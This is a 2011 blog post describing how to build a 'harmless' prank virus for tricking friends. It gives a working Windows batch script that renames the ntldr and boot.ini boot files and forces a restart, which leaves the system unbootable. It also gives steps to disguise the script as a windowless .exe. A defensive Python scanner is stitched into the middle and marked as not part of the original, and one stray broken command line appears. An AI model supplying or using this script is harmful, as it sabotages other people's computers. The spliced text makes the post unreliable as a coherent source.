Creating a fake “harmless” Virus !

Posted: July 2, 2011 in Uncategorized

Hello guys !

Today I was having a conversation with a friend of mine and I got to know about a trick to trick our friends, and I thought of sharing it online. So here it is:

1. Create a boot disk containing the boot files.

2. Open Notepad and copy the following code:

@echo off
ATTRIB -h -r -s c:\ntldr
REN c:\ntldr dxcore69ldr
shutdown.exe -r -f -t 05

3. Save the file with a *.bat extension.
4. Download a bat2exe software to convert the file to .exe.
5. The virus renames the ntldr file to dxcore69ldr, preventing the OS from loading.
6. Test the virus on a computer or using virtual PC software such as VMware or the free VirtualBox.

Full Detail Procedure:

To start from the basics, operating systems such as Windows XP require these three vital boot files to start:

1. boot.ini
2. ntldr
3. NTDETECT.COM

These files are usually located on the C: drive, and if they are missing or renamed, the operating systems that depend on them won’t be able to boot.

So, taking advantage of this, the main aim of the virus is to rename one of these files so that the operating system (usually the widely used Windows XP) won’t be able to boot.

But safety always comes first, so we will create a floppy boot disk to recover from the virus infection. These instructions can be found all over the Information Superhighway, and every IT magazine has published rescue disk instructions in an article at least once. Anyway, the steps are:

1. Go to Control Panel and then open Folder Options
2. Click on the View tab
3. Click on “Show Hidden Files and Folders”, uncheck the “Hide Extensions for known file types” and “Hide protected operating system files” and then click “OK” and “Yes”.
4. Now format a Floppy Disk even if it’s empty and don’t attempt to copy anything now.
5. Now copy the three visible boot files (boot.ini, NTDETECT.COM and ntldr) from the C drive directly to the Floppy Disk.

Now, if you set the floppy drive to boot first in the BIOS while the rescue floppy disk is inserted, your operating system will boot even though the boot files on the C: drive are missing.

Let’s make the virus now by renaming only the ntldr file. Go to Start>Programs>Accessories>Notepad or Start>Run>notepad.exe and copy and paste the following lines:

@echo off
ATTRIB -h -r -s c:\ntldr
REN c:\ntldr dxcore69ldr
shutdown.exe -r -f -t 05

Now go to File>Save and Type “dxcore69.bat” and the file will be saved with a .bat extension.

You can now double-click the dxcore69.bat file you have created; the ntldr file should be renamed to dxcore69ldr, preventing the OS from booting, and a reboot will occur after five seconds. With that, the work of the virus is complete.

In addition, you may want to create an uneditable, virus-looking file by converting the .bat file to a noticeable .exe file. Well, the bat2exe software of the Package given at the end is just excellent for doing that. Browse and select dxcore69.bat, select an icon if you want, and check the Ghost Application option, as it will then show no window after launch.

Now let’s learn what is going on:

Line # 1: @echo off
Not strictly necessary if the file is converted to an exe with the Ghost Application option, but its job is to stop the commands from being displayed in the black console window.

Line # 2: ATTRIB -h -r -s c:\ntldr
The ntldr file is a Read Only, Hidden and System file. This command just clears those attributes: -h removes the Hidden attribute, whereas +h would set it. Similarly, “r” is the Read Only attribute and “s” is the System file attribute. Clearing them is necessary for the rename to work.

Line # 3: REN c:\ntldr dxcore69ldr
REN stands for RENAME; with this command the ntldr file on the C: drive is renamed to dxcore69ldr.

Line # 4: shutdown.exe -r -f -t 05
This command restarts the computer with a timeout of 5 seconds and forces all applications to close. The switches are:
-r = Restart
-f = Force applications to close
-t = Timeout
05 = Timeout value in seconds

Line # 5: EXIT
Not shown in the listing above; it just exits the program.
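From the defender's side, the same line-by-line reading can be turned into a static check. The following is an added example, not part of the original post: a heuristic scanner for batch files that flags attribute clearing, renaming or deletion of the boot files named on this page, together with a forced restart. The function names and severity labels are assumptions made for illustration.

```python
import re

# Boot-critical files named on this page (Windows XP-era loader files).
BOOT_FILES = {"ntldr", "boot.ini", "ntdetect.com"}
TAMPER = re.compile(r"^\s*@?(ren|rename|del|erase|move|attrib)\b(.*)$", re.I)
CLEARS_ATTR = re.compile(r"(?<!\S)-[hrs]\b", re.I)  # ATTRIB -h / -r / -s
FORCED_RESTART = re.compile(
    r"^\s*@?shutdown(\.exe)?\b(?=.*[-/]r\b)(?=.*[-/]f\b)", re.I)

# Sample input: the first listing from this page, copied unchanged.
PAGE_SCRIPT = r"""@echo off
ATTRIB -h -r -s c:\ntldr
REN c:\ntldr dxcore69ldr
shutdown.exe -r -f -t 05
"""

def boot_targets(args):
    """Boot-critical file names referenced at the root of a drive."""
    toks = (t.strip('"').lower() for t in re.findall(r'"[^"]+"|\S+', args))
    roots = (re.fullmatch(r"(?:[a-z]:|%systemdrive%)\\([^\\]+)", t) for t in toks)
    return sorted({m.group(1) for m in roots if m and m.group(1) in BOOT_FILES})

def scan_batch(text):
    """Return (line number, finding kind, file name or None) tuples."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if FORCED_RESTART.search(line):
            findings.append((lineno, "forced-restart", None))
            continue
        m = TAMPER.match(line)
        if not m:
            continue
        cmd, args = m.group(1).lower(), m.group(2)
        if cmd == "attrib" and not CLEARS_ATTR.search(args):
            continue  # setting attributes is not tampering
        kind = "attrib-clear" if cmd == "attrib" else "rename-or-delete"
        findings += [(lineno, kind, name) for name in boot_targets(args)]
    return findings

def verdict(findings):
    # A boot-file rename/delete together with a forced restart is the page's pattern.
    kinds = {kind for _, kind, _ in findings}
    if {"rename-or-delete", "forced-restart"} <= kinds:
        return "high"
    return "medium" if "rename-or-delete" in kinds else ("low" if kinds else "clean")

if __name__ == "__main__":
    print(verdict(scan_batch(PAGE_SCRIPT)), scan_batch(PAGE_SCRIPT))
```

The check only reads plain .bat text; a file already converted with bat2exe would need its script extracted before scanning.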

Now that you have learnt some basics, you can also rename the remaining two files. To do that, type these lines between the @echo off line and the shutdown line:

ATTRIB -h -r -s c:\boot.ini
REN c:\boot.ini dxcore69.ini

REN c:\ntldr

So the new overall virus is:

@echo off

ATTRIB -h -r -s c:\ntldr
REN c:\ntldr dxcore69ldr

ATTRIB -h -r -s c:\boot.ini
REN c:\boot.ini dxcore69.ini


shutdown.exe -r -f -t 05

It is natural to be afraid of testing a virus on your own PC, but that is no problem: you can try it in virtual machine software such as VMware or the free VirtualBox. This kind of software gives you the ability, for example, to install and run Windows Vista in a window on Windows XP, using a virtual hard disk.

Well guys give your views :-

